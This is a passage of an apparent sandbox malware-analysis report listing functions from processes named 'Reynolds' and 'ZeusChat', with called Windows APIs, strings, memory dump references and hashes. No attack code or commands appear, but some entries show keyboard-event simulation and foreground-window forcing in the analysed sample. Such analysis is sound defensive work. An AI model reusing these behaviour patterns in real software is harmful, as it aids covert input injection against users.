                                                                                                      • Instruction Fuzzy Hash: 68E0EC13714E7083FA07AFA094293AE2DA16FC63C0F64449A7DCB4269BDE3DD4C2A591
                                                                                                      Function 00007FF7AA115468 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7AA115471
                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7AA115482
                                                                                                        • Part of subcall function 00007FF7AA116EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7AA115487), ref: 00007FF7AA116F1D
                                                                                                        • Part of subcall function 00007FF7AA116EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7AA115487), ref: 00007FF7AA116F4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3561508498-410509341
                                                                                                      • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction ID: 6874bcdeee752b78f6ba47fa5a8117a589e90cb222ad3675a96ec9ec6827f111
                                                                                                      • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction Fuzzy Hash: F7D0122261AA46E1EF11FB00E4807A9E330F780318FD54475D14D41571DF2DD547C310
                                                                                                      Function 000002453CA22C0E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 682475483-0
                                                                                                      • Opcode ID: a6d88c89072f1fa9a60b0e709705f2d7f8a7c68915f02510d17b338a51659705
                                                                                                      • Instruction ID: 51cea9bbb03d95853ab3e2d726e6fd8cbd005d414881373e64ae6353d1d79954
                                                                                                      • Opcode Fuzzy Hash: a6d88c89072f1fa9a60b0e709705f2d7f8a7c68915f02510d17b338a51659705
                                                                                                      • Instruction Fuzzy Hash: FD01FB37301E3883F6579F51FA1C3542A60B748BE1F4402D1C99A97AA7DF38E8D68200

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF752024364 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                      • String ID: Shell_TrayWnd
                                                                                                      • API String ID: 3778422247-2988720461
                                                                                                      • Opcode ID: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                      • Instruction ID: 356ad995c4a2189ac3f87b65b293023cb89e1b0443c4dc814a598f031583fdf9
                                                                                                      • Opcode Fuzzy Hash: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                      • Instruction Fuzzy Hash: FE419535B0A65287E765BB25AC5873EA6A2BF88B81FD84070C80E47754DEBDBC0DC750
                                                                                                      Function 00007FF752008790 Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 3372153169-0
                                                                                                      • Opcode ID: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                      • Instruction ID: 37805f81a77ff73f4311bb52a68b0343741143276c40f8197351239a79c694bd
                                                                                                      • Opcode Fuzzy Hash: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                      • Instruction Fuzzy Hash: 9422B372E0A64281FB64AB25DC5437DA761FB44BA4FDC8132CA1E47694DFBCE849C360
                                                                                                      Function 00007FF752002820 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                      • API String ID: 1458621304-248962490
                                                                                                      • Opcode ID: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                      • Instruction ID: a7397189eb728164e523cdb976889c7b249fe4b36307240932c94345e3776577
                                                                                                      • Opcode Fuzzy Hash: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                      • Instruction Fuzzy Hash: 41D19036A066428AE754EF38DC907AD77A1FB84748F944135DA0E43BA8DFBCE449C710
                                                                                                      Function 00007FF752004528 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P
                                                                                                      • API String ID: 0-3110715001
                                                                                                      • Opcode ID: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                      • Instruction ID: f212d70120f75d4cf10aeb70a67bf144c50fa17e62cde1f3ff1a47e2345896ac
                                                                                                      • Opcode Fuzzy Hash: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                      • Instruction Fuzzy Hash: 54A1B272A0A64186F764EF26D8146ADF760FF84784FD88135DA9E03A95CFBCE909C710
                                                                                                      Function 00007FF752042290 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                      • String ID: -$:$:$?
                                                                                                      • API String ID: 3440502458-92861585
                                                                                                      • Opcode ID: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                      • Instruction ID: b8c06e19d3b366cbdaaa1b9329288293fb49c9430d77b4fc26a09c360993f180
                                                                                                      • Opcode Fuzzy Hash: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                      • Instruction Fuzzy Hash: C4E1F432E0A6568AE720BF319D405B9AB91FF84788FDC8135EA4E43A95CF7CD449C760
                                                                                                      Function 00007FF7520024D4 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 381COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752002794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF75204A57D), ref: 00007FF7520027B1
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520025EA
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520026F8
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF75200270D
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF752002786
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                      • String ID: +
                                                                                                      • API String ID: 3744519093-2126386893
                                                                                                      • Opcode ID: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                      • Instruction ID: 126cc0659a0f22addb3116b6c8ede537fff306724f2fc571bbb3c8223ee992f1
                                                                                                      • Opcode Fuzzy Hash: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                      • Instruction Fuzzy Hash: 05E1FE21E0E25686F6307E295D6827EE655AB49BC0FCC4235D84C47BDACEBCF909C760
                                                                                                      Function 00007FF752098CB0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                      • API String ID: 0-572801152
                                                                                                      • Opcode ID: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                      • Instruction ID: 4fb204eccd9747cb3d685bfea471eaef9deccea0e0d01400fffa1be33c9486e8
                                                                                                      • Opcode Fuzzy Hash: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                      • Instruction Fuzzy Hash: CAE1F532A0AB8286EB10EF65D8402EDB7A0FB88798F944136DE4E57B94DF7CD549C710
                                                                                                      Function 00007FF75203AD08 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                      • Instruction ID: 5aab6c3ec99cbb03c78608d752e918bb7fe6af4737c4fcf0de1bd16de64e0994
                                                                                                      • Opcode Fuzzy Hash: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                      • Instruction Fuzzy Hash: 0F319F36609B8186DB60DF25EC403AEB7A4FB88754F980136EA8D43B98DF7CC549CB10
                                                                                                      Function 00007FF7520376EC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: !$VUUU$fmod
                                                                                                      • API String ID: 1757819995-2579133210
                                                                                                      • Opcode ID: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                      • Instruction ID: 55b8ef19b56aa2a45a830a366035ff3bd943c8da279b68406d988b5ffe41db50
                                                                                                      • Opcode Fuzzy Hash: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                      • Instruction Fuzzy Hash: E2B1F521E1DFC844D6A39B3459013BAF259AFBA390F54C332E94E35BA4DF6CA486C601
                                                                                                      Function 00007FF752042BB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF752042BF0
                                                                                                        • Part of subcall function 00007FF75203AF34: GetCurrentProcess.KERNEL32(00007FF75203B0A5), ref: 00007FF75203AF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                      • String ID: *$.$.
                                                                                                      • API String ID: 2518042432-2112782162
                                                                                                      • Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                      • Instruction ID: 347369b8580d68201e2f631ae67eaaf1dc4ff0f4113fd67a7e10be442b91a7c3
                                                                                                      • Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                      • Instruction Fuzzy Hash: 63510662F16A5589FB10EFA19D002BDA3A0BF54BC8F988536CE0D17B84DEBCD04AC350
                                                                                                      Function 00007FF7520AF0C0 Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF128
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF133
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF14C
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF15E
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF17F
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF18E
                                                                                                      • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1B3
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1BE
                                                                                                      • CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1C6
                                                                                                      • FrameRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1D9
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1E2
                                                                                                      • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF237
                                                                                                      • FillRect.USER32(?,?,?,?,?,00000000), ref: 00007FF7520AF267
                                                                                                      • GetWindowLongW.USER32(?,?,?,?,?,00000000), ref: 00007FF7520AF286
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,00000000), ref: 00007FF7520AF2D3
                                                                                                        • Part of subcall function 00007FF7520AF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF45F
                                                                                                        • Part of subcall function 00007FF7520AF418: SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF46A
                                                                                                        • Part of subcall function 00007FF7520AF418: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF485
                                                                                                        • Part of subcall function 00007FF7520AF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF498
                                                                                                        • Part of subcall function 00007FF7520AF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4C3
                                                                                                        • Part of subcall function 00007FF7520AF418: CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4DA
                                                                                                        • Part of subcall function 00007FF7520AF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4EB
                                                                                                        • Part of subcall function 00007FF7520AF418: SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4FB
                                                                                                        • Part of subcall function 00007FF7520AF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF50E
                                                                                                        • Part of subcall function 00007FF7520AF418: InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF535
                                                                                                        • Part of subcall function 00007FF7520AF418: RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF561
                                                                                                        • Part of subcall function 00007FF7520AF418: GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF56F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 3521893082-0
                                                                                                      • Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                      • Instruction ID: b2c453aa662f745f06945bc56a4f4d4a49cd87890876fbcfd8adbc9731f9eed7
